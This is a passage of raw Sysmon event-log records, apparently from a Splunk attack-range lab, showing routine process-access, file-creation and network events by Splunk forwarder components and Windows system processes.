Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220122Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:44.570{4F8D34B0-15F8-6216-DE04-000000003902}3232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296110Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:45.636{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-153MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296109Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:45.586{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03A5D7B91757778347EC6F98D64870AE,SHA256=C09F0B35C55B2117D44B38E8121BAED670DB9C4D993CC6A2F73A69EB7A574EE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220152Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.632{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=504A54EC877C979687DE440098A92E9B,SHA256=B1200DA8DD7F32138D8D7850A79076B68FF7D72768037BE38EA953E5DCAEDD0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220151Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.601{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C95E49BEF13AFDFC0FA1156023BD35D6,SHA256=3BF72B9B5383A3D15E7467EFCCCCA02D2C95C10F005B826F66CD38D91926AE14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220150Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.601{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CA641B31BC482002145D8B77B21F55C3,SHA256=DDDF1A01610766BF4546A51165648F49A58B75913D866D372D5F3CF253E35EC2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220149Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.069{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-15F9-6216-DF04-000000003902}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220148Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.069{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220147Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.069{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220146Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.069{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220145Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.069{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220144Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.069{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220143Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.069{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220142Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.069{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220141Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.069{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220140Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.069{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220139Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.069{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-15F9-6216-DF04-000000003902}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220138Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.069{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-15F9-6216-DF04-000000003902}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220137Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.070{4F8D34B0-15F9-6216-DF04-000000003902}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296111Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:46.601{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57812E87923246E76C0F1A222650B2D3,SHA256=F5478B76A72BC2DD90E46D03F35ED0EAE03E96B0ED10D37CECE901296A6F46D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220154Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:46.648{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E93E95E54814259F7322A04C80C26C6C,SHA256=408F230F60B0B8DDAF0F1676D4030F4824127E74397D4F7C44371978E5EA9AAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220153Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:46.429{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296112Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:47.654{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49E46B5C38001B77FBC71B97C714023B,SHA256=F9C0FDA36036E1236108A7162B6A6D0F16BAE8F65498AC9DC89B100C403D0016,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220183Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.944{4F8D34B0-15FB-6216-E104-000000003902}29882640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000220182Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:45.536{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51564-false10.0.1.12-8000- 10341000x8000000000000000220181Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.757{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-15FB-6216-E104-000000003902}2988C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220180Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220179Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220178Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220177Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220176Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:47.757{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 